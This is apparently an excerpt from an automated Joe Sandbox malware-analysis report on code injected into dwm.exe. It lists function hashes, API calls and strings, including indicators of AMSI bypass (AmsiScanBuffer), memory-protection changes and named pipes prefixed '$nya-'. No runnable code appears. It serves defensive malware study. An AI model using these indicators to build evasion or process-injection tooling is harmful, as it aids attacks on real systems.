                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: f3175ab9bcf814dd420a54b8c5e47d8c3a85aee280334f30fdd6aa25a72b2de1
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: FF519C32701E24D1EA189B56A80C7A922B0AB49BB0FD84725DE7947FD0EF3AD65D8740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 79eebeeea8eb118916d0eda9454e38644123b0cb9c9798ef4695d7c32eca9c9c
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: F6317C36A00E60E6E721DF12A80C759A3B0BB98F95FC54525DE4947E28DF39C55AC740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 843c0ab050e5dc9186cd6ab82f13d119bd0f797b27d970d1ebf14714769f23ed
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: DED19E72600BA0CAEB64DF69D49C39E77B0F755788F901A05EE8957F9ADB36C098C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: c4113c2c39446a7ee9839a48dd83c3e4969bee18a5cf484c77f8ebefaf03d7f6
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 37D18C32A04FA0CAEB28DB65E44C39D77B4F785788F900115EE8957F9ADB36D689C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 5de7ef49f1eddf215600ff2dcb176773ba43a11c04e93ddfdfb036716f5949ad
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: B611F332618A60C2E710CB21F85C35A6770FB89BA4F944215EA9A06EA8DF7DC149CF40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: f966d0fbfd5181f3d4ab3cb4e0010a4d60398171696f2f1d33717b0f0e3c08e3
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 08810431700E71C6FB54AB66984E39D32F1AB96780FC84925AE4947F96DB3BC84EC740
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9B31
                                            • GetLastError.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9B69
                                            • FreeLibrary.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9BD7
                                            • GetProcAddress.KERNEL32(?,?,?,00000262F1DF9C6B,?,?,?,00000262F1DF945C,?,?,?,?,00000262F1DF8F65), ref: 00000262F1DF9BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: bd35e50b7c9577164dd31b6bb9e7c7d82c69ea216ab55e633be8508c41b8759c
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 9131E431612E24C1EF199B12A85C79523B4BB48BA8FD90525ED1D4BF98DF3AC54C8700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: c30f57fb76d3b04364d0244af361f0622d0cddff240ed87598fb5d101dcc3bed
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 77116A36310F60C6E7508B52E85C719A6B4F798FE4F844224EE5E87FA4CF3AC8088B40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: c37e83d5ede720489fd49d43090114b465004edaabc66ee7fc5d525d5058292e
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 7DD17A76208F98C1EB709B1AE49835A77B4F788B88F500116EA8D57FA5DF3AC655CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 0dddf79800a339e139615db1c909eb676572f5de6caa2341f7f55d863918b242
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 0A315A32701F65E6EA15DF26A94C769A3B0FB54B84F898020DF484BF55EF3AC5A9C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: ab872278efbad2bebf8b55e636892575e3cdf689cb00bd476fc6d32e4127cc8b
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 6911C235300E71C2FA18A731789D76E1272AB84BE0FD84624EC665AFCACE3AC61D4340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: d74e8ddb99d84f924abcd1d0f07239b668599017f54b52ac6a2bf701e9729563
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 4B01B331714A51C6EA14DB12A85C75A63B5EB88FD0F888035DE9947B54DE3AC98A8B80
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 2134daa2c36f85a437160493f126f850756f86f4d5285c97e08eb5a2c03a7fe1
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 2101C575611F60C2FB289B21E85C71A62B4AF49B85F944528DE4D0AFA4EF3EC55CCB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: dfdf98c78afa2085932e44662d161787091307bff80651dc4d6001d58ea75a6b
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: ABF03C72304A95D2EB208B61E58C3596371FB44F88FC44021DA4946D58DF6EC68CCB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 30ea306bba745eb18685f87dc028eacdafdff039199d8f5e14b494dfc86740a3
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 3DF05874304FA0C2EA488B12B91C12AA370AF48FC0F889030EE0A0BF18CE2DC54A8B00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: 84e92ab79a2a964b9cbebb102321c178b06ca96cf635f8ef1d024fadf620c84f
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 34F03071211E11C5EA149B24A89D3696370EF89B60FD40619DE6A46DE4DF3EC54CC700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 8b57134514d28b269daad84a15167f3bb4d74873c7df395a77a5c8ef63b6ec98
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: A0D09E30661E20D5FA0CAF11EC9C3682271BF64F01FC44459C90E02EA0DF7E855DC740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 92406344f6521794ac91242a58e91ca1bffece9981872e9a3fb355ce4d911971
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 6102C632219B94C6EB608B55E49835AB7B0F385794F504115EA8E87FA8DB7EC598CF00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 65d062dcc2678e32cc844d1d847d279685c448c3aecce38d77328a468b13f347
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 50516E36214E65C7E728CF26A84C65AB3B1F788B84F90411DDE5A53F58DF3ADA49CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 90c825e220dd39dd9c3319960f274b2e90d8dd515f8614c33c7735deaf36e318
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: EB61A336529E94C6E7648F15E45C71AB7B4F388748F904116FA8E87FA8DB7AC648CF00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
